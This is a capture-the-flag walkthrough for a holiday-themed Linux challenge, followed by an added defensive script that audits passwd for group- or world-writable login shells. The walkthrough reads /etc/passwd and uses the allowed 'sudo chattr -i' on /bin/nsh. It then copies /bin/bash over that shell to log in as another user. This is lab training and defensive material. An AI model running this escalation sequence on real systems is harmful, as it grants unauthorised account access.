Location: Speaker UNpreparedness Room

nyancat, nyancat 
I love that nyancat! 
My shell's stuffed inside one 
Whatcha' think about that? 

Sadly now, the day's gone 
Things to do!  Without one... 
I'll miss that nyancat 
Run commands, win, and done! 

Log in as the user alabaster_snowball with a password of Password2, and land in a Bash prompt. 

Target Credentials: 

username: alabaster_snowball 
password: Password2 
elf@20165ddb66c7:~$ 

Alabaster's hint talks about checking /etc/passwd.

elf@20165ddb66c7:~$ cat /etc/passwd 
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
bin:x:2:2:bin:/bin:/usr/sbin/nologin 
sys:x:3:3:sys:/dev:/usr/sbin/nologin 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/usr/sbin/nologin 
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin 
elf:x:1000:1000::/home/elf:/bin/bash 
alabaster_snowball:x:1001:1001::/home/alabaster_snowball:/bin/nsh 

The last line of the file is the entry for Alabaster. The fields are:

  • username
  • password, which is x in this case, meaning refer to /etc/shadow
  • uid - user id
  • gid - group id
  • gecos, which is normally the user's real name, but is blank here
  • home directory
  • shell - the shell that the user logs in with, which we want to be bash

Let's look at /bin/nsh

elf@20165ddb66c7:~$ ls -l /bin/nsh 
-rwxrwxrwx 1 root root 75680 Dec 11 17:40 /bin/nsh 

'ls' shows that it is writable by anyone, but trying to overwrite the file does not work. This is where Alabaster's other hint comes into play. It is necessary to look at what sudo -l will allow to be run.

elf@20165ddb66c7:~$ sudo -l
Matching Defaults entries for elf on df02af27f0de:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User elf may run the following commands on df02af27f0de:
    (root) NOPASSWD: /usr/bin/chattr

chattr allows us to change file attributes, so let's use lsattr to see why this might be necessary.

elf@20165ddb66c7:~$ lsattr /bin/nsh 
----i---------e---- /bin/nsh 

/bin/nsh has the i attribute set. From the chattr man page:

A file with the 'i' attribute cannot be modified: it cannot be deleted or renamed, no link can be created to this file, most of the file's metadata can not be modified, and the file can not be opened in write mode.

So let's remove the attribute …

elf@20165ddb66c7:~$ sudo chattr -i /bin/nsh 
elf@20165ddb66c7:~$ lsattr /bin/nsh 
--------------e---- /bin/nsh 

replace /bin/nsh with /bin/bash …

elf@20165ddb66c7:~$ cp /bin/bash /bin/nsh 

check that the change has taken effect …

elf@20165ddb66c7:~$ ls -l /bin/bash /bin/nsh 
-rwxr-xr-x 1 root root 1168776 Apr 18  2019 /bin/bash 
-rwxrwxrwx 1 root root 1168776 Dec 16 22:53 /bin/nsh 

and log in as Alabaster.

elf@20165ddb66c7:~$ su - alabaster_snowball 
Password:  
Loading, please wait...... 


You did it! Congratulations! 


alabaster_snowball@20165ddb66c7:~$
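
A defender's check for the weakness this walkthrough relies on, as an added example that is not part of the original write-up: it reads a passwd file and reports every account whose login shell is writable by group or other. The function names, the root-prefix argument, the svc account and the fixture files are constructed for illustration.

```shell
#!/bin/sh
# audit_login_shells PASSWD_FILE [ROOT_PREFIX]
# Prints one finding per account whose login shell binary is missing or is
# writable by group or other. The mode bits are what is checked: on this page
# the immutable flag was the only protection on /bin/nsh, and it came off with
# a single sudo chattr -i.
audit_login_shells() {
    passwd_file=$1
    root=${2:-}
    while IFS=: read -r user pw uid gid gecos home shell; do
        [ -n "$shell" ] || continue          # empty shell field, nothing to check
        path="$root$shell"
        [ -e "$path" ] || { echo "MISSING $user $shell"; continue; }
        # find -L follows symlinks, so /bin/sh -> dash is judged by the target's
        # mode rather than by the link's own (always 777) mode.
        if [ -n "$(find -L "$path" -prune -perm -0002)" ]; then
            echo "WORLD-WRITABLE $user $shell"
        elif [ -n "$(find -L "$path" -prune -perm -0020)" ]; then
            echo "GROUP-WRITABLE $user $shell"
        fi
    done < "$passwd_file"
}

# Constructed fixture: a throwaway root with the modes shown in the ls -l
# output above, plus a hypothetical svc account whose shell is a symlink.
demo() {
    fixture=$(mktemp -d)
    mkdir -p "$fixture/bin" "$fixture/etc"
    : > "$fixture/bin/bash"; chmod 755 "$fixture/bin/bash"
    : > "$fixture/bin/nsh";  chmod 777 "$fixture/bin/nsh"
    ln -s bash "$fixture/bin/sh"
    cat > "$fixture/etc/passwd" <<'EOF'
elf:x:1000:1000::/home/elf:/bin/bash
svc:x:1002:1002::/home/svc:/bin/sh
alabaster_snowball:x:1001:1001::/home/alabaster_snowball:/bin/nsh
EOF
    audit_login_shells "$fixture/etc/passwd" "$fixture"
    rm -rf "$fixture"
}

demo
```

To audit a live system, call audit_login_shells /etc/passwd with no prefix.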